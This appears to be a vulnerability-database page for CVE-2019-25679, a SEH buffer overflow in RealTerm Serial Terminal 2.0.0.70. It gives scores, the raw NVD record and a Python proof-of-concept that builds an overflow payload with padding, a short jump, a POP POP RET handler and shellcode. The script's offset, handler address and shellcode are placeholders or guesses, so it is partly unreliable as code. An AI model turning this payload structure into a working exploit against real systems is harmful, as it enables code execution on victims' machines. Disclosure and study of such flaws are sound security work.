Security Vulnerability Report
中文
CVE-2019-25679 CVSS 7.8 HIGH

CVE-2019-25679

Published: 2026-04-05 21:16:46
Last Modified: 2026-04-20 17:48:37
Source: [email protected]

Description

RealTerm Serial Terminal 2.0.0.70 contains a structured exception handling (SEH) buffer overflow vulnerability in the Echo Port tab that allows local attackers to execute arbitrary code by supplying a malicious payload. Attackers can craft a buffer overflow payload with a POP POP RET gadget chain and shellcode that triggers code execution when pasted into the Port field and the Change button is clicked.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:crun:realterm:2.0.0.70:*:*:*:*:*:*:* - VULNERABLE
RealTerm Serial Terminal 2.0.0.70

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2019-25679 - RealTerm Serial Terminal SEH Buffer Overflow # This script generates a malicious payload to trigger the vulnerability. import sys def generate_payload(): # Buffer padding to reach SEH structure (Hypothetical offset) # Exact offset requires debugging, this demonstrates the structure padding = b"A" * 1000 # Next SEH: Jump short 6 bytes to skip SEH handler and land in shellcode next_seh = b"\xeb\x06\x90\x90" # SEH: Address of POP POP RET instruction # This address must be a valid address from a loaded module (e.g., OS DLL or App DLL) # Placeholder used here as exact address depends on system version seh_handler = b"\xAA\xBB\xCC\xDD" # Shellcode: Example (e.g., calc.exe or bind shell) # Real shellcode would be generated by msfvenom shellcode = b"\xCC" * 500 payload = padding + next_seh + seh_handler + shellcode return payload if __name__ == "__main__": print("[+] Generating payload for CVE-2019-25679...") payload = generate_payload() print(f"[+] Payload length: {len(payload)} bytes") print("[+] Copy the raw bytes below and paste into the 'Port' field in RealTerm Echo Port tab, then click 'Change'.") print(payload.decode('latin-1'))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25679", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:46.127", "lastModified": "2026-04-20T17:48:36.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RealTerm Serial Terminal 2.0.0.70 contains a structured exception handling (SEH) buffer overflow vulnerability in the Echo Port tab that allows local attackers to execute arbitrary code by supplying a malicious payload. Attackers can craft a buffer overflow payload with a POP POP RET gadget chain and shellcode that triggers code execution when pasted into the Port field and the Change button is clicked."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crun:realterm:2.0.0.70:*:*:*:*:*:*:*", "matchCriteriaId": "CBB4049D-EE6D-4CA8-B20B-5F32A28157EE"}]}]}], "references": [{"url": "https://realterm.sourceforge.io/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://sourceforge.net/projects/realterm/files/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46441", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/realterm-serial-terminal-buffer-overflow-seh", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.